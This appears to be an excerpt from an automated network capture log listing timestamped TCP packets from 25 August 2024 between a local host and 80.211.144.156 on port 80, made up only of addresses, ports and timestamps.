                                    Aug 25, 2024 15:43:49.517121077 CEST804974480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:49.517205954 CEST4974480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:49.591769934 CEST4974680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:49.592120886 CEST4974580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:49.596812963 CEST804974680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:49.596846104 CEST804974680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:49.596875906 CEST804974680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:49.597202063 CEST804974580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:49.597232103 CEST804974580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:49.960719109 CEST804974580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.006643057 CEST804974680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.018620014 CEST4974580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.060312033 CEST4974680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.090001106 CEST804974580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.138456106 CEST4974580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.142051935 CEST804974680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.185317039 CEST4974680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.292674065 CEST4974580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.292742968 CEST4974680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.293493986 CEST4974780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.298886061 CEST804974780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.298969030 CEST4974780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.299071074 CEST4974780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.300168037 CEST804974580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.300218105 CEST4974580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.300278902 CEST804974680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.300424099 CEST4974680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.304992914 CEST804974780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.654715061 CEST4974780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:50.659730911 CEST804974780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.659740925 CEST804974780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.659749985 CEST804974780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:50.979058981 CEST804974780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:51.029108047 CEST4974780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:51.178493023 CEST804974780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:51.183268070 CEST4974780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:51.188472033 CEST804974780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:51.191066980 CEST4974780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:51.310468912 CEST4974880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:51.315489054 CEST804974880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:51.315690994 CEST4974880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:51.315808058 CEST4974880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:51.324970961 CEST804974880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:51.670933008 CEST4974880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:51.675913095 CEST804974880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:51.675926924 CEST804974880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:51.675936937 CEST804974880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:52.012188911 CEST804974880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:52.060376883 CEST4974880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:52.151779890 CEST804974880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:52.201143980 CEST4974880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:52.423311949 CEST4974880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:52.423918009 CEST4974980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:52.428517103 CEST804974880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:52.428564072 CEST4974880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:52.428834915 CEST804974980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:52.428890944 CEST4974980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:52.429029942 CEST4974980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:52.433804035 CEST804974980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:52.791280985 CEST4974980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:52.796262980 CEST804974980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:52.796274900 CEST804974980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:52.796284914 CEST804974980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:53.111701012 CEST804974980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:53.154089928 CEST4974980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:53.308345079 CEST804974980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:53.357222080 CEST4974980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:53.431499958 CEST4974980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:53.432138920 CEST4975080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:53.436654091 CEST804974980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:53.436739922 CEST4974980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:53.437177896 CEST804975080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:53.437249899 CEST4975080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:53.437330961 CEST4975080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:53.442625046 CEST804975080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:53.794877052 CEST4975080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:53.799899101 CEST804975080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:53.799911976 CEST804975080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:53.799925089 CEST804975080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:54.109132051 CEST804975080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:54.154130936 CEST4975080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:54.304596901 CEST804975080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:54.357203960 CEST4975080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:54.433706999 CEST4975080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:54.434324026 CEST4975180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:54.438952923 CEST804975080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:54.439024925 CEST4975080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:54.439285994 CEST804975180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:54.439347029 CEST4975180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:54.439421892 CEST4975180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:54.444282055 CEST804975180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:54.794907093 CEST4975180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:54.799859047 CEST804975180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:54.799933910 CEST804975180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:54.799972057 CEST804975180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.121423960 CEST804975180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.169708967 CEST4975180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.184789896 CEST4975280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.185064077 CEST4975180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.189965963 CEST804975280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.190053940 CEST4975280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.190298080 CEST804975180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.190349102 CEST4975180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.192445040 CEST4975280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.197880030 CEST804975280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.460539103 CEST4975380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.465398073 CEST804975380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.465459108 CEST4975380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.465590000 CEST4975380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.470906973 CEST804975380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.544792891 CEST4975280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.549664974 CEST804975280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.549833059 CEST804975280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.810698986 CEST4975380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.815673113 CEST804975380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.815685987 CEST804975380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.815696955 CEST804975380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.860856056 CEST804975280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:55.904174089 CEST4975280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:55.995625019 CEST804975280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.044819117 CEST4975280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.145257950 CEST804975380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.185331106 CEST4975380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.343777895 CEST804975380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.388497114 CEST4975380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.472362041 CEST4975280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.472419024 CEST4975380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.473166943 CEST4975580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.477364063 CEST804975280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.477435112 CEST4975280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.477672100 CEST804975380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.477718115 CEST4975380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.477998972 CEST804975580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.478060007 CEST4975580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.478168964 CEST4975580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.482927084 CEST804975580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.826076031 CEST4975580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:56.831084013 CEST804975580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.831103086 CEST804975580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:56.831115961 CEST804975580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:57.210558891 CEST804975580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:57.263456106 CEST4975580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:57.343698978 CEST804975580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:57.388499975 CEST4975580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:57.543404102 CEST4975580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:57.545170069 CEST4975680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:57.548719883 CEST804975580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:57.548789024 CEST4975580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:57.550231934 CEST804975680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:57.550307989 CEST4975680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:57.550467014 CEST4975680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:57.557981014 CEST804975680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:57.910370111 CEST4975680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:57.915419102 CEST804975680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:57.915438890 CEST804975680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:57.915458918 CEST804975680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:58.232053041 CEST804975680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:58.279122114 CEST4975680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:58.363725901 CEST804975680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:58.404073954 CEST4975680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:58.478555918 CEST4975680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:58.479227066 CEST4975780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:58.483757973 CEST804975680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:58.483829021 CEST4975680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:58.484122992 CEST804975780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:58.484216928 CEST4975780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:58.491348028 CEST4975780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:58.496218920 CEST804975780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:58.841797113 CEST4975780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:58.846839905 CEST804975780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:58.846856117 CEST804975780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:58.846874952 CEST804975780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:59.159846067 CEST804975780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:59.201081038 CEST4975780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:59.287777901 CEST804975780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:59.341629982 CEST4975780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:59.403027058 CEST4975880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:59.408083916 CEST804975880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:59.408261061 CEST4975880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:59.408261061 CEST4975880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:59.413286924 CEST804975880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:59.767230988 CEST4975880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:59.772202969 CEST804975880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:59.772222042 CEST804975880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:59.772265911 CEST804975880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:00.082312107 CEST804975880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:00.122905970 CEST4975880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.215471029 CEST804975880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:00.267877102 CEST4975880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.675384998 CEST4975780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.683794022 CEST4975880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.684678078 CEST4975980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.689249992 CEST804975880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:00.689301014 CEST4975880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.689860106 CEST804975980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:00.689919949 CEST4975980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.690026045 CEST4975980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.694844961 CEST804975980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:00.998790979 CEST4975980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:00.999325037 CEST4976080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.004159927 CEST804976080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.004241943 CEST4976080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.004389048 CEST4976080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.009273052 CEST804976080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.047235012 CEST804975980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.119014025 CEST4976180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.123930931 CEST804976180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.124023914 CEST4976180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.124092102 CEST4976180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.128932953 CEST804976180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.170975924 CEST804975980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.171221972 CEST4975980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.357532978 CEST4976080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.362632990 CEST804976080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.362662077 CEST804976080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.482335091 CEST4976180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.487327099 CEST804976180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.487343073 CEST804976180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.487355947 CEST804976180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.706126928 CEST804976080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.747839928 CEST4976080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.813946962 CEST804976180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.857209921 CEST4976180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.941901922 CEST804976180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.950906038 CEST804976080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:01.982239962 CEST4976180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:01.997894049 CEST4976080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.056817055 CEST4976180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.056818962 CEST4976080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.057599068 CEST4976280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.062105894 CEST804976180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.062228918 CEST4976180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.062426090 CEST804976280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.062480927 CEST804976080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.062505007 CEST4976280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.062536955 CEST4976080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.062608957 CEST4976280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.067426920 CEST804976280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.419992924 CEST4976280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.425045967 CEST804976280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.425065041 CEST804976280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.425090075 CEST804976280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.745142937 CEST804976280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.794744015 CEST4976280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:02.943983078 CEST804976280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:02.997857094 CEST4976280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:03.232106924 CEST4976380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:03.237685919 CEST804976380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:03.237751961 CEST4976380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:03.237884045 CEST4976380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:03.243900061 CEST804976380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:03.591744900 CEST4976380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:03.596853018 CEST804976380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:03.596869946 CEST804976380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:03.596894026 CEST804976380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:03.924252987 CEST804976380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:03.966641903 CEST4976380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.058253050 CEST804976380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:04.107264996 CEST4976380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.180942059 CEST4976280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.182662964 CEST4976380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.183331966 CEST4976480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.187881947 CEST804976380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:04.187999010 CEST4976380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.188155890 CEST804976480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:04.188220978 CEST4976480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.188342094 CEST4976480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.193455935 CEST804976480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:04.544873953 CEST4976480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.550128937 CEST804976480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:04.550146103 CEST804976480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:04.550179958 CEST804976480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:04.859798908 CEST804976480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:04.904114008 CEST4976480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:04.995398998 CEST804976480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.044764042 CEST4976480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:05.118622065 CEST4976480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:05.119291067 CEST4976580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:05.123805046 CEST804976480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.123918056 CEST4976480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:05.124147892 CEST804976580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.124233007 CEST4976580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:05.124339104 CEST4976580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:05.129168987 CEST804976580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.534811020 CEST4976580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:05.539815903 CEST804976580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.539834023 CEST804976580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.539846897 CEST804976580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.788036108 CEST804976580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.841593027 CEST4976580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:05.922456980 CEST804976580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:05.966635942 CEST4976580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.051646948 CEST4976580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.051959991 CEST4976680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.056776047 CEST804976680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.056895971 CEST4976680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.056988001 CEST804976580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.057044029 CEST4976580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.057090044 CEST4976680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.062072039 CEST804976680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.404344082 CEST4976680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.409360886 CEST804976680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.409373999 CEST804976680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.409384012 CEST804976680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.721429110 CEST804976680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.763484955 CEST4976680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.918792009 CEST804976680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.966592073 CEST4976680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.967493057 CEST4976680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.968090057 CEST4976780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.972956896 CEST804976680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.973014116 CEST4976680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.973126888 CEST804976780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:06.973192930 CEST4976780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.973325968 CEST4976780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:06.978163004 CEST804976780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.040429115 CEST4976780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.041054964 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.045886993 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.045990944 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.046091080 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.050957918 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.087230921 CEST804976780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.404225111 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.409320116 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.409337997 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.409351110 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.437971115 CEST804976780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.438040972 CEST4976780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.722455025 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.763529062 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.925570011 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.966629028 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.471653938 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.473146915 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.478660107 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.478709936 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.478719950 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.478763103 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.483916044 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.489458084 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.841804028 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.846966982 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.846996069 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.847006083 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.165605068 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.216634035 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.299252987 CEST804976980.211.144.156192.168.2.6
